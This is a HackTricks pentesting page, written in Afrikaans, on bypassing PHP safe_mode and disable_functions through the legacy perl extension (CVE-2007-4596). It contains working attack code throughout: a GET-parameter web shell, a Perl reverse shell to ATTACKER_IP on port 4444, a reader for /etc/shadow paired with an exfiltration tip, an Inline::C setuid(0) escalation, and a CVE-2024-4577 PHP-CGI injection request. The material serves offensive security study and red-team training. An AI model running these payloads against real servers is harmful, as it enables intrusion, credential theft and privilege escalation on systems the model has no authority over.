PHP Perl Extension Safe_mode Bypass Exploit

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Agtergrond

Die probleem wat opgespoor is as CVE-2007-4596 kom van die legacy perl PHP extension, wat ’n volledige Perl-interpreter inbed sonder om PHP se safe_mode, disable_functions, of open_basedir kontroles te eerbiedig. Enige PHP worker wat extension=perl.so laai, kry onbeperkte Perl eval, sodat opdraguitvoering eenvoudig bly selfs wanneer alle klassieke PHP-proses-spawn primitives geblokkeer is. Alhoewel safe_mode in PHP 5.4 verdwyn het, lewer baie verouderde shared-hosting stacks en kwetsbare labs dit steeds, so hierdie bypass is steeds waardevol wanneer jy op legacy control panels beland.

Kompatibiliteit en Verpakkingsstatus (2025)

  • Die laaste PECL vrystelling (perl-1.0.1, 2013) mik op PHP ≥5.0; PHP 8+ misluk gewoonlik omdat die Zend APIs verander het.
  • PECL word vervang deur PIE, maar ouer stacks lewer steeds PECL/pear. Gebruik die onderstaande flow op PHP 5/7 teikens; op nuwer PHP’s verwag om te downgrade of oor te skakel na ’n ander injection path (bv. userland FFI).

Bou ’n Toetsbare Omgewing in 2025

  • Haal perl-1.0.1 van PECL, kompileer dit vir die PHP-branch wat jy beplan om aan te val, en laai dit globaal (php.ini) of via dl() (indien toegelaat).
  • Vinnige Debian-gebaseerde lab resep:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Tydens eksplorasie, bevestig beskikbaarheid met var_dump(extension_loaded('perl')); of print_r(get_loaded_extensions());. Indien afwesig, soek na perl.so of misbruik beskryflike php.ini/.user.ini inskrywings om dit te force-load.
  • Omdat die interpreter binne die PHP worker leef, is geen eksterne binaries nodig nie—network egress filters of proc_open swartlyste maak geen saak nie.

Op-gasheer bouketting wanneer phpize bereikbaar is

As phpize en build-essential op die gekompromitteerde gasheer teenwoordig is, kan jy perl.so kompileer en neersit sonder om na die OS uit te shell:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

As open_basedir afgedwing is, sorg dat die geplaatste .user.ini en .so in ’n toegelate pad is; die extension=-direktief word steeds binne die basedir gerespekteer. Die kompileer-vloei weerspieël die PHP-handleiding vir die bou van PECL-extensions.

Oorspronklike PoC (NetJackal)

Van http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, nog steeds handig om te bevestig dat die extension op eval reageer:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Moderne Payload-verbeterings

1. Volledige TTY oor TCP

Die ingeslote interpreter kan IO::Socket laai selfs al is /usr/bin/perl geblokkeer:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Lêerstelsel-ontsnapping selfs met open_basedir

Perl ignoreer PHP se open_basedir, sodat jy arbitrêre lêers kan lees:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Lei die uitset deur IO::Socket::INET of Net::HTTP om data te exfiltrate sonder om PHP-beheerde deskriptoren aan te raak.

3. Inline Compilation vir Privilege Escalation

As Inline::C stelselwyd beskikbaar is, kompileer helpers binne die versoek sonder om op PHP’s ffi of pcntl te vertrou:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Behandel Perl as ’n LOLBAS-gereedskapstel—bv., lees MySQL DSNs uit selfs al is mysqli nie beskikbaar nie:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Misbruik: Loading perl.so via PHP-CGI Argument Injection (CVE-2024-4577)

Op Windows-installings wat nog steeds PHP-CGI blootstel, laat die 2024 argument-injection regresie (CVE-2024-4577) jou toe om arbitrêre -d opsies aan die interpreter deur te gee. Dit beteken dat jy die Perl-uitbreiding kan laai selfs wanneer dl() gedeaktiveer is en php.ini slegs-leesbaar is:

  • Bou of laai ’n kompatibele perl.dll/perl.so op na ’n web-skryfbare pad (bv., C:\xampp\htdocs\temp\perl.dll).
  • Stuur ’n enkele HTTP-versoek wat -d extension=C:\\xampp\\htdocs\\temp\\perl.dll inspuit en, in dieselfde versoekliggaam, ’n Perl-backed payload:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Omdat die PHP-worker nou Perl inkorporeer voordat dit die body lees, word alle klassieke disable_functions/open_basedir-kontroles omseil. Dit werk op kwesbare Windows/CGI-stakke totdat dit gepatch is (PHP 8.1.29/8.2.20/8.3.8 en later sluit die regresie). As open_basedir die DLL-pad blokkeer, plaas die lêer eers binne die toegelate basismap of benut ’n bestaande vir almal leesbare DLL-pad wat met XAMPP meegelewer word.

Verwysings

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks